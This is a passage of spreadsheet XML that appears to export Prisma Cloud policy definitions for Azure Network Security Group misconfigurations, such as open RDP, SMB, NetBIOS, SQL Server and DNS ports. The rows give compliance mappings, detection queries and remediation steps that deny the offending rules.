          <t>3beed53c-3f2d-47b6-bb6f-95da39ff0f26</t>
        </is>
      </c>
      <c r="AJ2336" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2336" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2337">
      <c r="A2337" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, PCI DSS v4.0,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GDPR,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PCI DSS v4.0, CSA CCM v.4.0.1, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, PCI DSS v4.0, HITRUST CSF v.11.2.0, PCI DSS v4.0, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated],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PCI DSS v4.0,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37" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2337" s="2" t="inlineStr"/>
      <c r="D2337" t="inlineStr"/>
      <c r="E2337" t="inlineStr"/>
      <c r="F2337" t="inlineStr"/>
      <c r="G2337" t="b">
        <v>0</v>
      </c>
      <c r="H23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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2337" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2337" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on NetBIOS (UDP Port 137)</t>
        </is>
      </c>
      <c r="L2337" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2337" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2337" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2337" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2337" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2337" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2337" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2337" t="inlineStr"/>
      <c r="T2337" t="b">
        <v>0</v>
      </c>
      <c r="U2337" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2337" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2337" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on NetBIOS (UDP Port 137). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict NetBIOS solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2337"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7" t="inlineStr"/>
      <c r="Z2337"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Udp or protocol equals *) and (destinationPortRange contains _Port.inRange(137,137) or destinationPortRanges[*] contains _Port.inRange(137,137) ))] exists</t>
        </is>
      </c>
      <c r="AA2337" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2337" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2337" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-280</t>
        </is>
      </c>
      <c r="AD2337" t="b">
        <v>1</v>
      </c>
      <c r="AE2337" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2337" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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7" t="inlineStr">
        <is>
          <t>18e1dd76-9d0f-4cdb-96d4-9d01b5cd68dc</t>
        </is>
      </c>
      <c r="AI2337" t="inlineStr">
        <is>
          <t>e51a22c2-f8d1-4f12-86ad-f64751ba3406</t>
        </is>
      </c>
      <c r="AJ2337" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2337" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2338">
      <c r="A2338"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TX-RAMP Level 1,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Microsoft Cloud Security Benchmark v1,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Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, GDPR, NIST CSF, SOC 2, NIST CSF, FFIEC, TX-RAMP Level 2,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DORA, TX-RAMP Level 2, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2338" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2338" s="2" t="inlineStr"/>
      <c r="D2338" t="inlineStr"/>
      <c r="E2338" t="inlineStr"/>
      <c r="F2338" t="inlineStr"/>
      <c r="G2338" t="b">
        <v>1</v>
      </c>
      <c r="H23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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2338" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2338" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on Windows SMB (TCP Port 445)</t>
        </is>
      </c>
      <c r="L2338" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2338" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2338" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2338" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2338" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2338" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2338" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2338" t="inlineStr"/>
      <c r="T2338" t="b">
        <v>0</v>
      </c>
      <c r="U2338" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2338" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2338" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on Windows SMB TCP port 445. Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict DNS solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2338"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8" t="inlineStr"/>
      <c r="Z2338"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_Port.inRange(445,445) or destinationPortRanges[*] contains _Port.inRange(445,445) ))] exists</t>
        </is>
      </c>
      <c r="AA2338" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2338" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2338" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-286</t>
        </is>
      </c>
      <c r="AD2338" t="b">
        <v>1</v>
      </c>
      <c r="AE2338" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2338" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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8" t="inlineStr">
        <is>
          <t>500e9f2a-1063-4066-8eea-780efa90a0d7</t>
        </is>
      </c>
      <c r="AI2338" t="inlineStr">
        <is>
          <t>c446ec59-db8f-47a1-ace1-cfe6cd366982</t>
        </is>
      </c>
      <c r="AJ2338" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2338" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2339">
      <c r="A2339" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, Azure Security Benchmark (v3), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, Azure Security Benchmark (v2), HIPAA, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), CIS v1.2.0 (Azure), MITRE ATT&amp;CK v8.2 [Deprecated], NIST SP 800-171 Revision 3, GDPR, APRA (CPS 234) Information Security, PCI DSS v4.0, CIS v1.5.0 (Azure) - Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, CIS v1.1 (Azure), NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Azure Security Benchmark (v3), TX-RAMP Level 1, CIS v1.3.1 (Azure), SOC 2, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, NIST SP 800-172, TX-RAMP Level 1, CIS v2.1.0 (Azure) Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, MPAA Content Protection Best Practices, NIST CSF, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, Azure Security Benchmark (v3), Microsoft Cloud Security Benchmark v1, CIS v1.4.0 (Azure), Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], PCI DSS v4.0, Azure Security Benchmark (v3), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, NIST CSF, CIS v2.0.0 (Azure) Level 1, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, ITSG-33, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v3), GDPR, SOC 2, FFIEC, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, Telecommunications Security Act - TSA, CCPA 2018, PIPEDA, CyberSecurity Law of the People's Republic of China, CIS v1.3.0 (Azure), NIST CSF, Brazilian Data Protection Law (LGPD), TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v3), CSA CCM v3.0.1, NIST SP 800-171 Revision 2, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2339" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2339" s="2" t="inlineStr"/>
      <c r="D2339" t="inlineStr"/>
      <c r="E2339" t="inlineStr"/>
      <c r="F2339" t="inlineStr"/>
      <c r="G2339" t="b">
        <v>1</v>
      </c>
      <c r="H23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Matt's alert rule with auto remediation,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39" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2339" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2339" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on RDP Port 3389</t>
        </is>
      </c>
      <c r="L2339" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2339" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2339" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2339" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2339" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2339" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R2339" t="inlineStr">
        <is>
          <t>Control Reference:09.ab</t>
        </is>
      </c>
      <c r="S2339" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2339" t="b">
        <v>1</v>
      </c>
      <c r="U2339" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2339" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2339" t="inlineStr">
        <is>
          <t>This policy identifies any NSG rule that allow all traffic on RDP port 3389. Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict RDP solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2339"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39" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Network/networkSecurityGroups/securityRules/*' permission. Successful execution will update the network security group to revoke the inbound rule records allowing traffic from Internet on port 3389.",
'impact': 'reject all traffic from Internet on port 3389',
'cliScriptTemplate': 'az network nsg rule update --name $ruleName --resource-group $resourceGroup --nsg-name $resourceName --access Deny'</t>
        </is>
      </c>
      <c r="Z2339"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(destinationPortRange contains _Port.inRange(3389,3389) or destinationPortRanges[*] contains _Port.inRange(3389,3389) ))] exists</t>
        </is>
      </c>
      <c r="AA2339" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2339" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2339" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-54</t>
        </is>
      </c>
      <c r="AD2339" t="b">
        <v>1</v>
      </c>
      <c r="AE2339" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2339" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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Matt's alert rule with auto remediation - Notifications:splunk, AccountGroups:Matt's Azure Account group;,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39" t="inlineStr">
        <is>
          <t>a36a7170-d628-47fe-aab2-0e734702373d</t>
        </is>
      </c>
      <c r="AI2339" t="inlineStr">
        <is>
          <t>a36a7170-d628-47fe-aab2-0e734702373d</t>
        </is>
      </c>
      <c r="AJ2339" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2339" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2340">
      <c r="A2340"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40" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2340" s="2" t="inlineStr"/>
      <c r="D2340" t="inlineStr"/>
      <c r="E2340" t="inlineStr"/>
      <c r="F2340" t="inlineStr"/>
      <c r="G2340" t="b">
        <v>0</v>
      </c>
      <c r="H23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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2340" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2340" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on SQL Server (TCP Port 1433)</t>
        </is>
      </c>
      <c r="L2340" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2340" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2340" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2340" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2340" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2340" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2340" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2340" t="inlineStr"/>
      <c r="T2340" t="b">
        <v>0</v>
      </c>
      <c r="U2340" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2340" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2340" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on SQL Server (TCP Port 1433). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict SQL Server solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2340"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0" t="inlineStr"/>
      <c r="Z2340"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_Port.inRange(1433,1433) or destinationPortRanges[*] contains _Port.inRange(1433,1433) ))] exists</t>
        </is>
      </c>
      <c r="AA2340" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2340" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2340" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-276</t>
        </is>
      </c>
      <c r="AD2340" t="b">
        <v>1</v>
      </c>
      <c r="AE2340" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2340" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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0" t="inlineStr">
        <is>
          <t>3aa12e75-d78b-4157-9eca-6049187a30d7</t>
        </is>
      </c>
      <c r="AI2340" t="inlineStr">
        <is>
          <t>65c342f9-1663-4114-bb70-f3ef303aa561</t>
        </is>
      </c>
      <c r="AJ2340" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2340" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2341">
      <c r="A2341"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PCI DSS v4.0, CSA CCM v.4.0.1, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1,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ITSG-33, kashan ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, TX-RAMP Level 2,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CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2341" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2341" s="2" t="inlineStr"/>
      <c r="D2341" t="inlineStr"/>
      <c r="E2341" t="inlineStr"/>
      <c r="F2341" t="inlineStr"/>
      <c r="G2341" t="b">
        <v>0</v>
      </c>
      <c r="H23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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2341" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2341" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on NetBIOS DNS (UDP Port 53)</t>
        </is>
      </c>
      <c r="L2341" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2341" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2341" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2341" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2341" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2341" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2341" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2341" t="inlineStr"/>
      <c r="T2341" t="b">
        <v>0</v>
      </c>
      <c r="U2341" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2341" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2341" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on DNS UDP port 53. Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict DNS solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2341"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1" t="inlineStr"/>
      <c r="Z2341"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Udp or protocol equals *) and (destinationPortRange contains _Port.inRange(53,53) or destinationPortRanges[*] contains _Port.inRange(53,53) ))] exists</t>
        </is>
      </c>
      <c r="AA2341" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2341" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2341" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-285</t>
        </is>
      </c>
      <c r="AD2341" t="b">
        <v>1</v>
      </c>
      <c r="AE2341" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2341" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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1" t="inlineStr">
        <is>
          <t>709b47cd-6b7a-4500-b99e-a58529a6c79e</t>
        </is>
      </c>
      <c r="AI2341" t="inlineStr">
        <is>
          <t>4f0dc13f-88d1-4820-8e9b-3e04779b0da9</t>
        </is>
      </c>
      <c r="AJ2341" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2341" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2342">
      <c r="A2342" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF, HITRUST v.9.4.2 [Deprecated], Telecommunications Security Act - TSA, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, ISO/IEC 27002:2013, MITRE ATT&amp;CK v8.2 [Deprecated], CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, ISO/IEC 27002:2013, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, NIST CSF v2.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, HIPAA, ITSG-33, CIS Controls v7.1, NIST CSF, TX-RAMP Level 2, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, Insurance Regulatory And Development Authority Of India, CIS Controls v7.1, SOC 2, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Telecommunications Security Act - TSA, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], PCI DSS v4.0, ISO/IEC 27017:2015, SOC 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, NIST 800-53 Rev4, CSA CCM v.4.0.1, SOC 2, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone,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ITSG-33, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, TX-RAMP Level 1, GDPR, NIST CSF, SOC 2, NIST CSF, kfirdaus AWS Account-CS, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, Australian Energy Sector Cyber Security Framework (AESCSF), CyberSecurity Law of the People's Republic of China, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, ISO/IEC 27002:2013, DORA, TX-RAMP Level 2, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2342" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2342" s="2" t="inlineStr"/>
      <c r="D2342" t="inlineStr"/>
      <c r="E2342" t="inlineStr"/>
      <c r="F2342" t="inlineStr"/>
      <c r="G2342" t="b">
        <v>0</v>
      </c>
      <c r="H23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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2342" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2342" t="inlineStr">
        <is>
          <t>Azure Network Security Group with overly permissive outbound rule</t>
        </is>
      </c>
      <c r="L2342" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2342" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2342" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2342" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2342" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2342" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R2342" t="inlineStr">
        <is>
          <t>AC-17 (2)</t>
        </is>
      </c>
      <c r="S2342" t="inlineStr"/>
      <c r="T2342" t="b">
        <v>1</v>
      </c>
      <c r="U2342" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2342" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2342" t="inlineStr">
        <is>
          <t>This policy identifies NSGs with overly permissive outbound rules allowing outgoing traffic from source type any or source with public IP range. A network security group contains a list of security rules that allow or deny inbound or outbound network traffic based on source or destination IP address, port, and protocol. As a best practice, it is recommended to configure NSGs to restrict traffic to known sources on authorized protocols and ports.</t>
        </is>
      </c>
      <c r="X2342" t="inlineStr">
        <is>
          <t>1. Sign in to the Azure Portal
2. On left Navigation, Click on All services
3. Under NETWORKING, click on Network security groups
4. Choose the reported resource
5. Under SETTINGS, Click on Outbound security rules
6. Identify the row which matches conditions mentioned below:
a) Source: Any, public IPs
b) Destination: Any
c) Action: Allow
7. Select the rule you need to modify, and edit it to allow specific IP addresses OR set the 'Action' to 'Deny' OR 'Delete' the rule based on your requirement.</t>
        </is>
      </c>
      <c r="Y2342" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Network/networkSecurityGroups/securityRules/*' permission. Successful execution will update the network security group to revoke the outbound rule records allowing all traffic to any source.",
'impact': 'reject all traffic to any source',
'cliScriptTemplate': 'az network nsg rule update --name $ruleName --resource-group $resourceGroup --nsg-name $resourceName --access Deny'</t>
        </is>
      </c>
      <c r="Z2342" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name= 'azure-network-nsg-list' AND json.rule = securityRules[?any(access equals Allow and direction equals Outbound and (sourceAddressPrefix equals * or sourceAddressPrefix equals 0.0.0.0/0 or sourceAddressPrefix equals ::/0) and (destinationAddressPrefix equals * or destinationAddressPrefix equals Internet))] exists</t>
        </is>
      </c>
      <c r="AA2342" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2342" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2342" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-181</t>
        </is>
      </c>
      <c r="AD2342" t="b">
        <v>1</v>
      </c>
      <c r="AE2342" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2342" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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2" t="inlineStr">
        <is>
          <t>22979dcf-b4d4-4a74-bf7f-2fae67adc3a9</t>
        </is>
      </c>
      <c r="AI2342" t="inlineStr">
        <is>
          <t>f2f5d323-77f0-473c-b29d-458c7d6cca99</t>
        </is>
      </c>
      <c r="AJ2342" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2342" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2343">
